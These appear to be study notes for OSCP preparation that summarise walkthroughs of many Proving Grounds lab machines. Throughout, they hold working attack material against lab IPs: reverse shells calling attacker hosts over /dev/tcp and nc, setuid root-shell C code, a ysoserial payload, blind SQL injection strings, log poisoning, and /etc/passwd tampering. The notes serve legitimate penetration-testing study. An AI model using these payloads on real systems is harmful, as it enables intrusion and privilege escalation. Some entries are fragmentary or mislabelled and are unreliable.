Good articles

[WDavid404]

proving-grounds-all-33-warm-up-machines (https://medium.com/@abhirupkonwar04/proving-grounds-all-33-warm-up-machines-pwned-618cdb3d9607)

https://medium.com/@Dpsypher https://juggernaut-sec.com/

[WDavid404]

backupbuddy (Linux, 2024)

https://medium.com/@redleafdev/backupbuddy-proving-grounds-write-up-7779845d296f

Points:

• [80/tcp web page] Clicking on the link takes you to the Github hosting the code.
• Looking back at the README.md I do notice that this application is shipped with default credentials.
• LFI:
• so, get id_rsa file
• SSH login with private key
• [PE] there is a custom binary located in /opt and even better, it’s and SUID binary (This means that it will always execute as the root user.) "string" for this binary file and put a dependence file on it ---> made a so file

create a ma_libm.c file

#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor))
void bad_stuff() {
        setuid(0);
        setgid(0);
        system("/bin/sh -i");
}

then, gcc -shared -fPIC -o libm.so ma_libm.c

https://miro.medium.com/v2/resize:fit:786/format:webp/1*uCmquwqy1tRyH_tgyULgJw.png

[WDavid404]

BadCorp PG box

https://systemweakness.com/proving-grounds-badcorp-walkthrough-54c393758380

Points:

• [80/tcp web page] there are many users profiles (photo, name, phone number, etc) --> made userlist.txt and passwordlist.txt --> when using phone number as password list, it works. (Tool: username-anarchy to generate possible user list)
• password is phone number !
• FTP login and found SSH key
• [PE] /usr/local/bin/backup binary was set with SUID bit. Transferred the binary and decompiled it with Ghidra --> extract info about password and copy location.

[WDavid404]

Banzai (Linux, 2020)

https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-banzai-a07932f899cf

Points:

• obtained valid credentials by bruteforcing the ftp service. hydra -v -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt $IP ftp
• uploading a php reverse shell on FTP
• [PE]https://steflan-security.com/linux-privilege-escalation-exploiting-user-defined-functions/

[WDavid404]

Billyboss (Windows, 2020)

https://medium.com/@Dpsypher/proving-grounds-practice-billyboss-5c69bf508e5d https://benheater.com/proving-grounds-billyboss/

# -I : ignore any restore files
# -f : stop when a login is found
# -L : username list
# -P : password list
# ^USER64^ and ^PASS64^ tells hydra to base64-encode the values
# C=/ tells hydra to establish session cookies at this URL
# F=403 tells hydra that HTTP 403 means invalid login
hydra -I -f -L usernames.txt -P passwords.txt 'http-post-form://192.168.233.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403'

• created a custom wordlist with cewl to try my luck at that.

  cewl http://192.168.233.61:8081/ | grep -v CeWL > custom-wordlist.txt
  cewl --lowercase http://192.168.233.61:8081/ | grep -v CeWL  >> custom-wordlist.txt

[WDavid404]

Bottleup (Linux, 2023)

https://medium.com/@ardian.danny/oscp-practice-series-39-proving-grounds-bottleup-36dbbb79b931

Points:

• LFI wfuzz -c --hh=32 -z file,LFI\ payloads.txt http://192.168.160.246:8080/view?page=FUZZ --> http://192.168.160.246:8080/view?page=%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd

• LFI to get interesting files https://github.com/ricew4ng/Blasting-Dictionary/blob/master/LFI-Interesting-Files%EF%BC%88249%EF%BC%89.txt -- /proc/self/environ -- /proc/self/cmdline --> found "/opt/bottle-blog/app.py" --> The code imports ‘secret’ from ‘config.secret.’ Therefore, there must be a ‘secret.py’ file under the ‘config’ folder --> found secret info in "/opt/bottle-blog/config/secret.py" --> use this app secret to create a cookie for any user, including the ‘admin’ user (based on app.py) utilize the obtained cookie in the web application.

• [foothold] https://squ1rrel.dev/sekai-bottle

• [PE] With full write permissions over ‘app.service’ and ‘larj.service’ --> it seems the ‘mpstats’ command is not defined in the PATH variable location. Create a malicious ‘mpstats’ binary in the ‘/home/hcue’ directory and wait for the service to execute it.

[WDavid404]

Breakout (Linux, 2022)

https://medium.com/@4HM7H3X/breakout-proving-ground-practice-walkthrough-intermediate-e7fb6cd8572f

Points:

• GitLab Community Edition (CE) 13.10.3 — User Enumeration
• Gitlab 13.9.3 — Remote Code Execution (Authenticated)
• found an ssh key in /var/opt/gitlab/backups and found another user name using the api on GitLab (/api/v4/users/4) --> SSH login with ssh key
• [PE] and we have write permission on /var/log/gitlab ln -s /root/.ssh/id_rsa /var/log/gitlab/root_id_rsa ★ --> succeed in obtaining root’s id_rsa key

[WDavid404]

bullyBox (Linux, 2023)

Points:

• BoxBilling<=4.22.1.5 — Remote Code Execution (RCE) — PHP webapps Exploit (exploit-db.com), but it needs admin credential info..
• git-dumper http://bullybox.local/.git . or wget -r http://bullybox.local/.git --> found username and password
• [PE] just run "sudo su"

[WDavid404]

Butch (Windows, 2020)

https://auspisec.com/blog/20220118/proving_grounds_butch_walkthrough.html

Points:

• For SMTP, autorecon was able to enumerate several valid users via the smtp-user-enum command.
• The username field in login page is susceptible to SQL injection (it is a blind SQL injection vulnerability.)
• run sudo responder -I tun0 but didn't get any info
• blindly confirmed table and userinfo (confirmed there is a table named USERS with the columns USERNAME and PASSWORD_HASH, all table columns)

  
  '; IF (1=1) WAITFOR DELAY '0:0:10';--
  '; IF (1=2) WAITFOR DELAY '0:0:10';--
  '; IF ((select count(name) from sys.tables where name = 'users')=1) WAITFOR DELAY '0:0:10';--
  '; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' and c.name = 'username')=1) WAITFOR DELAY '0:0:10';--
  '; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' and c.name like 'pass%')=1) WAITFOR DELAY '0:0:10';--
  '; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' and c.name like 'passw%')=1) WAITFOR DELAY '0:0:10';--
  '; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' and c.name = 'password_hash')=1) WAITFOR DELAY '0:0:10';--

confirm columns number

'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' )>3) WAITFOR DELAY '0:0:10';--

see if we could determine any existing users in the table

'; IF ((select count(username) from users where username = 'butch')=1) WAITFOR DELAY '0:0:10';--

update password

'; update users set password_hash = 'tacos123' where username = 'butch';-- '; IF ((select count(username) from users where username = 'butch' and password_hash = 'tacos123')=1) WAITFOR DELAY '0:0:10';--
====> failed..

Try different passwod hash method: echo -n 'tacos123' | md5sum echo -n 'tacos123' | sha1sum echo -n 'tacos123' | sha256sum

finally '; update users set password_hash = '6183c9c42758fa0e16509b384e2c92c8a21263afa49e057609e3a7fb0e8e5ebb' where username = 'butch';--

-->  login the web page with user butch and password tacos123.

- The web page has upload button --> upload our code as site.master.cs and create a reverse shell listener
![image](https://github.com/user-attachments/assets/fc1a418b-e45b-46a1-b20b-bc64400d86f5)

- 

[WDavid404]

Cassios (Linux, 2020)

https://medium.com/@ardian.danny/oscp-practice-series-52-proving-grounds-cassios-19bc1ad2446e

Points:

• Gobuster on port 80 found /backup_migration --> donwload .tar file and get credentials --> login to page
• According to the code we downloaded, when clicking "backup" button, It tries to load recycler.ser file
• we made a malicious recycler.ser file and upload to SMB java -jar /opt/ysoserial-all.jar CommonsCollections4 "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4yMzgvNDQ1IDA+JjE=}|{base64,-d}|{bash,-i}" > recycler.ser
• [PE] sudo -l ---> -->

  ln -s /etc/sudoers /home/samantha/asd/recycler.ser
  sudoedit -u root /home/samantha/asd/recycler.ser

[WDavid404]

Catto (Linux, 2021)

https://medium.com/@ardian.danny/oscp-practice-series-51-proving-grounds-catto-a96d11381ad7

Points:

• get several potential usernames on a web page (30330/tcp)
• CMS is Gatsby --> according to Gatsby' official page, it is using GraphQL. According to the official documentation (https://www.gatsbyjs.com/docs/tutorial/getting-started/part-4/), we can interact with it from /___graphql. and got a path disclosure revealing Marcus is one of the home users /home/marcus/gatsby-blog-starter/src/ .
• also queried “allSitePage” and discovered all paths in the application--> found password info on one of paths --> SSH login
• Checking the home directory, there’s a weird .bash file Also there’s a binary in /usr/bin called base64key

The private key is Marcus’s password (WallAskCharacter305) -->/usr/bin/base64key F2jJDWaNin8pdk93RLzkdOTr60== WallAskCharacter305 1
--> got root's password

[WDavid404]

Charlotte (Linux, 2022)

https://rouvin.gitbook.io/ibreakstuff/writeups/proving-grounds-practice/linux/charlotte

Points:

• nfs port (2049/tcp) is open

  showmount -e 192.168.183.184
  --->
  Export list for 192.168.183.184:
  /srv/nfs4/backups *
  /srv/nfs4         *

  mount on /backups and view the files present

  $ sudo mount -t nfs 192.168.183.184:/srv/nfs4/backups ~/pg/linux/charlotte/mnt/ -o nolock
  $ cd mnt
  $ ls -la                             
  total 32
  drwxr-xr-x 3 root root 4096 Feb 16  2022 .
  drwxr-xr-x 4 kali kali 4096 Jul 12  2022 ..
  -rw-r--r-- 1 root root  552 Nov 25  2021 ._index.js
  -rw-r--r-- 1 root root 1450 Nov 25  2021 index.js
  -rw-r--r-- 1 root root  552 Jan 12  2022 ._package.json
  -rw-r--r-- 1 root root  141 Jan 12  2022 package.json
  -rwxr-xr-x 1 root root  552 Jan 30  2022 ._templates
  drwxr-xr-x 2 root root 4096 Jan 30  2022 templates

  --> index.js contains some information pertaining to an authentication to web page (8000/tcp)

feroxbuster -u http://192.168.183.184 --> README --> found that nginx configuration has checks on the User-Agent --> We can change this to "googlebot":feroxbuster -H 'User-Agent: googlebot' -u http://192.168.183.184 --> find more directories (e.g. /admin)

• visiting the /admin directory are blocked by a WAF, this can be bypassed by setting the Host header to localhost since the Nginx configuration uses our $host values.
• package.json has some libraries version info --> EJS, Server side template injection RCE (CVE-2022-29078) - writeup (https://eslam.io/posts/ejs-server-side-template-injection-rce/)
• [PE]Cron -> It uses a package.js file from /var/www/node, a directory we have write access over as www-data. We can create a package.js file like this:

  require('child_process').exec("bash -c 'bash -i >& /dev/tcp/192.168.45.208/80 0>&1'")

[WDavid404]

Chatty (Linux, 2021)

https://medium.com/@ardian.danny/oscp-practice-series-53-proving-grounds-chatty-2f89e2a1ef8c

Keypoints:

• Rocket.chat service --> unauthenticated Remote Code Execution (RCE) exploit using blind SQL injection for it (CVE-2021–22911)
• [PE] Check Maidag’s version and look for a suitable exploit --> https://github.com/bcoles/local-exploits/blob/master/CVE-2019-18862/exploit.ldpreload.sh

[WDavid404]

Cobweb (Linux, 2021)

https://www.myhackingnotes.com/proving_grounds/cobweb.html

Keypoints:

• FTP login -> get /.index.php.swp file --> see some php code involving interaction with the SQL database. --> exploit this code using a URL sql injection. I send this through Firefox to create a web page containing a reverse shell. http://192.168.248.162/"; INSERT INTO webpages(route_string, page_data) VALUES ('/rev', 'system("bash -i >& /dev/tcp/192.168.49.248/4444 0>&1");');-- -
• [PE]screens-4.5.0

[WDavid404]

Depreciated (Linux, 2022)

https://medium.com/@ardian.danny/oscp-practice-series-48-proving-grounds-depreciated-23b84201c463

Keypoints: graphql

• Using graphql enumeration ( https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql)

  
  query={__schema{types{name,fields{name}}}}

get function list

query={__schema{types{name,fields{name,args{name,description,type{name,kind,ofType{name, kind}}}}}}} query={listUsers}

use getOTP function

query={getOTP(username:"jason")} --> get OTP

login via nc
![image](https://github.com/user-attachments/assets/651377ec-253f-4d6b-9f12-6c884af2f700)
list message --> get peter's password --> SSH login

[PE]  see the source-code on the /opt directory --> found root's password in msg.json file

[WDavid404]

Dibble (Linux, 2020)

https://github.com/AaronCaiii/OSCP-Prepare-Proving-grounds-Practice/blob/main/PG/7.%20Dibble.md

Keypoints:

• Node.js (3000/tcp) : Try to create a new log event (msg is 2*2) --> found the log result is 4 (the service will run our command in the msg) --> try to use node.js rev shell as a new log event

  (function(){
  var net = require("net"),
      cp = require("child_process"),
      sh = cp.spawn("/bin/sh", []);
  var client = new net.Socket();
  client.connect(4242, "10.0.0.1", function(){
      client.pipe(sh.stdin);
      sh.stdout.pipe(client);
      sh.stderr.pipe(client);
  });
  return /a/; // Prevents the Node.js application from crashing
  })();

• [PE] /usr/bin/cp has suid permissions

  
  [benjamin@dibble ~]$ cat /etc/passwd > passwd.bak

[benjamin@dibble ~]$ openssl passwd aaron openssl passwd aaron gaDFtFvvEwqho [benjamin@dibble ~]$ echo "root2:gaDFtFvvEwqho:0:0:root:/root:/bin/bash" >> passwd.bak [benjamin@dibble ~]$ mv passwd.bak passwd [benjamin@dibble ~]$ cp passwd /etc/passwd [benjamin@dibble ~]$ su root2 Password: aaron [root@dibble benjamin]# id id uid=0(root) gid=0(root) groups=0(root) [root@dibble benjamin]#

[WDavid404]

Educated (Linux, 2023)

https://anoetic.medium.com/oscp-proving-grounds-educated-496567e4c466

Keypoints:

• craft a new request to upload the pentestmonkey reverse shell --> got reverse shell -found mysql credentials info in /var/www/html/management/application/config/database.php file --> login to mysql and get a username and password
• find a development folder containing an android apk application --> using mobsf tool --> found credential info

[WDavid404]

Fail (Linux, 2021)

https://lipa.tech/posts/pg-fail/

Keypoints:

• Rsync (873/tcp):

  
  $ rsync rsync://192.168.67.126/    
  fox             fox home

$ rsync rsync://192.168.67.126/fox drwxr-xr-x 4,096 2021/10/27 23:48:57 . lrwxrwxrwx 9 2020/12/03 15:22:42 .bash_history -rw-r--r-- 220 2019/04/18 00:12:36 .bash_logout -rw-r--r-- 3,526 2019/04/18 00:12:36 .bashrc -rw-r--r-- 807 2019/04/18 00:12:36 .profile

Downloads files

rsync rsync://192.168.67.126/fox * .

write ssh keys and upload them via rsync.

$ mkdir .ssh # create the folder, because it isn't on the destination drive $ ssh-keygen -f .ssh/fall-ssh -t ecdsa -b 521 $ cp .ssh/fall-ssh.pub .ssh/authorized_keys $ rsync -a --relative .ssh/ rsync://192.168.67.126/fox/

ssh login

ssh -i .ssh/fall-ssh.pub fox@192.168.67.126

- [PE] found "fail2ban-server" is running (via `ps -aux`) --》 https://grumpygeekwrites.wordpress.com/2021/01/29/privilege-escalation-via-fail2ban

[WDavid404]

Fired (Linux, 2024)

https://medium.com/@0xrave/flasky-proving-grounds-practice-walkthrough-7e52d885c1a1

Keypoints：JWT

• From the guest page, we notice the comment mentioned the JWT token did not configured properly.

• JWT manipulation：using burp, find the JWT at /admin decoded JWT header and payload so, we make a fake JWT payload as "admin is true" ---> replace the JWT header and payload, remove the signature part --> so we can access the web page

• found cisco password on the web page and crack it via the website (https://www.ifm.net.nz/cookbooks/passwordcracker.html) --> SSH login

• [PE] method1: ps -aux ==> A calculator website service is running locally. We discover it using flask, and the secret info (via cal.bak file in home dic) decode its jwt and then make a new jwt (change logged_in to true )

  #install the flask unsign tools
  pip3 install flask-unsign
  #change the cookie value and sign
  flask-unsign --sign --cookie "{'logged_in': True}" --secret '$Input_the_secret'

  In the input filed, we confimed the "value2" filed can execute command by which user. --> value2=os.system("id|nc $KaliIP 80")

• [PE]method2:
  using linpeas --> CVE-2021–4034

[WDavid404]

G00g (Linux, 2021)

https://jaeng.medium.com/g00g-proving-grounds-creator-offsec-28b48cefa78d

Keypoints:

• After login with admin:admin, it requires 2FA Authentication token --> Checking the page source: <!-- itemir/apache_2fa -->we found that the web server implements Apache Two-Factor (2FA) Authentication with Google Authenticator (apache_2fafrom itemir). The README.md has the default secret key and default 'test_user' user. Then, set up OTP --> get OTP and login on the web page.

• The page /spool/viewresult.php?view=[NAME].txt… has LFI issue Utilizing LFI to read those files.

  /opt/apache_2fa/apache_credentials
  /opt/apache_2fa/tokens.json

  --> get credentails info --> SSH login

• [PE] /usr/bin/arj has SUID --> according to its help, abuse it.

[WDavid404]

Groove (Linux, 2024)

https://medium.com/@4HM7H3X/oscp-prep-pg-practice-walkthrough-groove-c8d06c75922d

Keypoints:

• found the password for admin on the page After logging in i determined the version from the bottom of the page --> found exploit (REF: https://www.exploit-db.com/exploits/51319) http://ip/EventAttendance.php?`Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT(%27Perseverance%27,usr_Username,%27:%27,usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday%20School--> got root's hash33b8fc76a24681b67a9431b632548d069336202bed5828fe431...2d1b`
• added the id (:2) after the hash when cracking it 33b8fc76a24681b67a9431b632548d069336202bed5828fe431...2d1b:2

[WDavid404]

unknown list

ERP

Hallucination

Forward

Marshalled

...

[WDavid404]

Hetemit (Linux, 2020)

https://medium.com/@blueclps080984/proving-grounds-hetemit-intermediate-linux-box-walkthrough-a-journey-to-offensive-security-3ca236db1288

Keypoints:

• curl –X post –-data “code=2*2” http://192.168.56.117:50000/verify --> get 4. so and it is using php

so, curl -X POST — data “code=os.system(‘nc -e /bin/bash 192.168.45.161 18000’)” http://192.168.229.117:50000/verify

• [PE] edit /etc/systemd/system/pythonapp.service to execute reverse shell command

[WDavid404]

Hunit (Linux, 2021)

https://medium.com/@blueclps080984/proving-grounds-hunit-intermediate-linux-box-walkthrough-a-journey-to-offensive-security-36081fc196d

Keypoints:

• found /api in web page source
• “/api” return many functions list --> call /user get user credentials --> SSH login
• [PE] discovered a cronjob named “crontab.bak” running as root.

1. found id_rsa file belonging to the “git” user --> ssh with git user so that we can commit our changes to git server.
2. modified the “backups.sh” file by injecting a reverse shell command using echo “sh -i >& /dev/tcp/[kali IP]/8080 0>&1” >> backups.sh. After committing the changes using git add -A and git commit -m “pwn”, we pushed the modified file to the git server using GIT_SSH_COMMAND=’ssh -i /home/kali/Downloads/ProvingGroundsBoxes/Hunit/id_rsa -p 43022' git push origin master (push git from our kali machine)

[WDavid404]

Illusion (Linux, 2022)

https://medium.com/@SxEl/proving-grounds-illusion-walkthrough-bbd0315231d6

Keypoints:

• /vendor/composer/installed.json---> twig was present, a php template engine --> twig 'version has a vulnerability caused by unsanitized user input, and it can lead to Remote Code Execution.
• bypasses login by inserting true into the password field, which usually has double quotes: “password”: “password”. But by changing it to “password”: true, the application thinks the password i submitted is correct and i bypass the login.

[PE]

• found a file called redis-openssl-gen-pass.txt in the home of a local user. --> it is not hash but password for redis ! --> login redis put a SSH key for root user and SSH login as root Refer: https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis#ssh

[WDavid404]

KeyVault (Linux, 2022)

https://medium.com/@ardian.danny/oscp-practice-series-76-proving-grounds-keyvault-a51557383935

Keypoints:

• There’s a .git repository on port 8080. Let’s dump it.--> Got the default credentials --》 there is a user called Ray.
• Confirm the source of /index.php page --> it requires hmac.php and will output username and password info. index.php

hmac.php--> need “h”, “host”, and “token” as GET parameters

According to the officail page of the function "hmac" (https://www.php.net/manual/en/function.hash-hmac.php) so, we can do as below --> 192.168.214.207:8080/index.php?h=663e7fa98837d5b3e5aa3056efacfc215d2b0ac1e6bfe88df8c715eb26d2d7e8&host=asd&token[]=asd

• [PE] found apache-restart binary in /opt and it require root's password. --> decompile it using Ghidra -->Seems like this is a Python program. Let’s use a Python decompiler--> https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc

  python3 /opt/pyinstxtractor.py apache-restart
  uncompyle6 apache-restart_extracted/apache-restart.pyc > decompiled_apache_restart.py

  --> got password

[WDavid404]

Kyoto

https://medium.com/@0xrave/kyoto-proving-grounds-practice-walkthrough-active-directory-820dfcff5ddd

Keypoints:

• access SMB server share folder with anonymouse --》 get FTP.exe --> run strings FPT.exe and get credentials info (but not useful in this box) --> actually it is related to buffer overflow.

[WDavid404]

Lunar (Linux, 2022)

https://al1z4deh.medium.com/proving-grounds-lunar-d88c0357a167

Keypoints:

• 80/tcp -> get backup.zip --> contains source code for pages
• Using Authentication bypass method (e.g. http://yrmyzscnvh.abctf.xyz/web6/?**password[]=%22%22** ) when the service is using [strcmp] function to check password. https://www.doyler.net/security-not-included/bypassing-php-strcmp-abctf2016

Here we see that we can read files with the ext parameter

  function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
            $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
            if(isset($_GET['show'])) {
                if(containsStr($_GET['show'], 'pending') || containsStr($_GET['show'], 'completed')) {
                    error_reporting(E_ALL ^ E_WARNING); 
                    include $_GET['show'] . $ext; 　　★★★★★
                } else {
                    echo 'You can select either one of these only';

$url/dashboard.php?show=completed&ext=../../../../../etc/passwd　ーー＞　work Check the access.log file for log poisoning URL/dashboard.php?show=completed&ext=../../../../../var/log/apache2/access.log Now let’s enter the poison, enter the cmd parameter

└─$ nc 192.168.60.216 80     
GET /<?php system($_GET['cmd']); ?>

made reverse shell payload (convert to URL format) URL/dashboard.php?show=completed&ext=../../../../../var/log/apache2/access.log&cmd=rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20192.168.49.60%20443%20%3E%2Ftmp%2Ff

• [PE] NFS: no_root_squash here we see that we can distribute nfs file only on localhost, for that we add our kali ip in /etc/hosts file.

  liam@lunar:~$ echo "192.168.49.60 localhost" >> /etc/hosts
  liam@lunar:~$ cat /etc/hosts
  127.0.0.1 localhost
  127.0.0.1 lunar
  192.168.49.60 localhost

  Preparing our payload and sending it inside

└─$ mkdir tmp

┌──(kali㉿kali)-[~/OSCP/lab/nfs] └─$ sudo mount -t nfs 192.168.60.216:/srv/share tmp -o nolock [sudo] password for kali:

┌──(kali㉿kali)-[~/OSCP/lab/nfs] └─$ ls tmp

┌──(kali㉿kali)-[~/OSCP/lab/nfs] └─$ cd tmp

┌──(kali㉿kali)-[~/OSCP/lab/nfs/tmp] └─$ ls

┌──(kali㉿kali)-[~/OSCP/lab/nfs/tmp] └─$ cat > shell.c<<EOF

include

int main(){ setuid(0); setgid(0); system("/bin/bash"); } EOF

┌──(kali㉿kali)-[~/OSCP/lab/nfs/tmp] └─$ sudo gcc -static shell.c -o shell shell.c: In function ‘main’: shell.c:5:3: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration] 5 | system("/bin/bash"); | ^~

┌──(kali㉿kali)-[~/OSCP/lab/nfs/tmp] └─$ sudo chmod u+s shell

Run the shell

liam@lunar:~$ cd /srv liam@lunar:/srv$ cd share liam@lunar:/srv/share$ ls shell shell.c liam@lunar:/srv/share$ ./shell root@lunar:/srv/share# whoami root root@lunar:/srv/share#

[WDavid404]

Malbec (Linux, 2021)

https://al1z4deh.medium.com/proving-grounds-malbec-240d1500b26b

Keypoints:

• FTP download malbec.exe --> Run it and found it opened 7138 port found this exe has buffer overflow issue.

[WDavid404]

Mantis (Linux, 2022)

https://viperone.gitbook.io/pentest-everything/writeups/hackthebox/active-directory/mantis

Keypoints: --> get password info after decoding

Install Impacket

git clone https://github.com/CoreSecurity/impacket.git
python setup.py install

Impacket contains goldenpac python file which is used for post exploitation, now execute given below command and access the victim’s terminal through that. goldenPac.py htb.local/james@mantis.htb.local

[WDavid404]

Maria (Linux, 2021)

Keypoints:

• wpscan --update --url http://192.168.169.167/ --enumerate ap --plugins-detection aggressive From the aggressive plugin detection scan, we uncovered several plugins --> use the exploited plugins

[WDavid404]

Markers (Linux, 2023)

https://medium.com/@Dpsypher/proving-grounds-practice-ctf-200-03-5bde2be7d439

[WDavid404]

Marketing (Linux, 2022)

https://medium.com/@ardian.danny/oscp-practice-series-32-proving-grounds-marketing-bf040837eeff

Keypoints:

• login the web page with common password (admin:password ) -> get CMS version info --> found an exploit available https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
• search config file --> get mysql login credential info --> got user credential info
• [PE] see details in the article.

[WDavid404]

Matrimony (Linux, 2022)

https://al1z4deh.medium.com/proving-grounds-matrimony-a121fa189966

Keypoints: docker

• webpage --> CMS version info -->Online Matrimonial Project 1.0 - Authenticated Remote Code Execution
• 【PE】
  1. check the network configurations Here we see that there is an available network connection to the Docker container. In the last line, we can see that the host (172.17.0.1) is connected to the docker instance (172.17.0.2:22). This indicates that we can use SSH in the container.

Try SSH login to 172.17.0.2 as root --> succeed

İmport the Docker binary from the target host to the container. https://al1z4deh.medium.com/proving-grounds-matrimony-a121fa189966

We find that we have 2 different image IDs, we can choose the one we want. We create a container and mount the target host’s /root directory to our new container.

We can check the /mnt folder to see if we have successfully mounted the /root directory into this new container.

[WDavid404]

Medjed (Windows, 2021)

https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-medjed-7570cbbea087

Key points：

• BarracudaDrive

• 8000/tcp，set up a new administrator account and after logging in we can see a web file server utility. We can also upload files onto certain directories. ---> Let’s upload a reverse shell and a web console to trigger that shell ---> uploaded the files but any kind of aspx or php reverse shell won’t compile and run on this file share environment.

• 33033/tcp webpage has many user info and we are able to update any user’s password from the forgot password page. After logging in as one of users with the new password, we see a link to the profile slug page --> SQL injection --> but tried several things, but it doesn’t return anything exciting.

• port 45332 can see the phpinfo page which indicates a Xampp server running on the host machine. Since we have the capability of uploading a file through the file service running on port 8000, I’ll upload a php script which executes the reverse shell we had uploaded earlier. We receive a reverse shell on executing this script.

• [PE] we have write access to an important file C:\bd\bd.exe. We will replace this executable with our reverse shell and restart the system to receive an administrator shell.

  copy /Y C:\Users\Jerren\Desktop\reverse.exe C:\bd\bd.exe
  shutdown -r

  And wait a minute for the system to restart. When it restarts, we get a reverse shell with system privileges on our listener.

[WDavid404]

midnight (Windows, 2023)

https://assume-breach.medium.com/oscp-prep-vulnhubs-midnight-walkthrough-a965f236770f

Key points：

• For mysql port, brute force to find the password of root login mysql --> update admin’s password --> login to /wp-admin with admin --> In "add plugin" page, upload a php shell file (Luckily even a non zip file can be uploaded) --> click on the php shell file on /uploads
• [PE] get jose credential info on /var/www/html/wordpress/wp-config.php --> su to jose linpeas-> strings /usr/bin/status --》 We see that this calls for the service binary. So, we can set our own service binary to call a NetCat listener back on our home system.

  export PATH=/tmp/:$PATH
  cd /tmp
  echo “nc 192.168.1.188 3333 -e /bin/sh” > service
  chmod +x service

  then， run /usr/bin/status

[WDavid404]

MZEEAV (Linux, 2023)

https://medium.com/@0xrave/ctf-200-02-offsec-proving-grounds-practice-labor-day-ctf-machine-walkthrough-78a5497ce589

Key points：

• Download backup.zip from /backups and read upload.php source code

  ....
  #Searches for '4D5A' within the string $magicbytes. If '4D5A' is not found, strpos() will return false.
  if ( strpos($magicbytes, '4D5A') === false ) {
      echo "Error no valid PEFILE\n";
      error_log(print_r("No valid PEFILE", TRUE));
      error_log(print_r("MagicBytes:" . $magicbytes, TRUE));
      exit ();
  }
  ...

  --> upload a web shell and Add 'MZ' (i.e. 4D5A) at the beginning of the file you going to upload.

• [PE] By checking SUID find / -perm /4000 2>/dev/null, we saw a fileS at /opt /opt/fileS --version --> actually It is a find binary! By checking GTFObin , we can execute command with find + SUID. Execute /opt/fileS . -exec /bin/sh -p \;

[WDavid404]

Nappa (Linux, 2020)

https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-nappa-bff7fa45d75d

Key points:

• port 8080: We can enumerate many users from the index page. In the source code of the register page, I see password left in clear text. We know a set of usernames and a password, but the login page requires an email address. registered as a random new user and open the question posted by admin.forum and we can find admin email address in the source code. --> login with admin credentials and Checking it’s source code

so, adding these input fileds --> We can use this to get a reverse shell.

• [PE] Checking out contents in the users home directory, we can see bashrc file containing an unusual big payload --> It is a base32 encoded SSH private key for root --> SSH as root

[WDavid404]

nara

[WDavid404]

Nibbles (Linux, 2020)

Key points:

• login to postgres with postgres:postgres --> but didn't useful info

• exploit : Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest --> able to get code execution. Then I uploaded my shell to the server using wget and executed it to get the shell.

• [PE] SUID -> /usr/bin/find

[WDavid404]

Nukem (Linux, 2020)

https://medium.com/@ardian.danny/oscp-practice-series-64-proving-grounds-30964bed6cf3

Key points:

• 80/tcp: wpscan --> There’s an upload directory listing and an admin user.--> The Simple File List plugin we discovered is version 4.2.2, which has an arbitrary file upload vulnerability.
• [PE] dosbox (https://gtfobins.github.io/gtfobins/dosbox/#suid)

[WDavid404]

Ochima (Linux, 2023)

https://medium.com/@0xrave/ctf-200-01-offsec-proving-grounds-practice-labor-day-ctf-machine-walkthrough-702633e20940

Key points:

• Port 8338: CMS is maltrail v0.52 -->　https://github.com/spookier/Maltrail-v0.53-Exploit/blob/main/exploit.py
• [PE] linpeas or pspy --> etc_Backup.sh (we have write permission on it)

  #at target machine
  echo -n "chmod u+s /bin/bash" | base64
  echo "echo -n 'Y2htb2QgdStzIC9iaW4vYmFzaA=='|base64 -d|bash" >> /var/backups/etc_Backup.sh
  #wait for a few second
  ls -al /bin/bash
  /bin/bash -p
  #You can use other payload as well such as 
  echo -n "sh -i >& /dev/tcp/$KaliIP/80 0>&1" | base64
  echo "echo -n 'c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xNzYvODAgMD4mMQ=='|base64 -d|bash" >> /var/backups/etc_Backup.sh

[WDavid404]

PayDay (Linux, 2020)

https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/payday

we can skip it because it is too simple

[WDavid404]

Pipe (Linux, 2024)

https://medium.com/@4HM7H3X/oscp-prep-pg-practice-walkthrough-pipe-727e14bd1956

WordPress version 6.2 is running on Port 80. We detect plugins ( (paid-memberships-pro-2.9.7)) using the wpscan tool. We discover an exploit ( https://www.exploit-db.com/exploits/51235 ) specific to this version and use sqlmap to execute the necessary command to dump wordpress usernames and passwords columns. We obtain the hash of the site administrator and gain root access by modifying the relevant plugin.

[WDavid404]

Postfish (Linux, 2021)

https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/postfish https://www.davila.me/menu/walkthroughs/oscp-practice/postfish

[WDavid404]

ProStore (Linux, 2023)

https://medium.com/@0xrave/prostore-proving-grounds-practice-walkthrough-6d3b30095328

Key points:

• 5000 port: on register page, While testing the captcha parameter, we get an error “ReferenceError: abc is not defined” by enter abc as value.

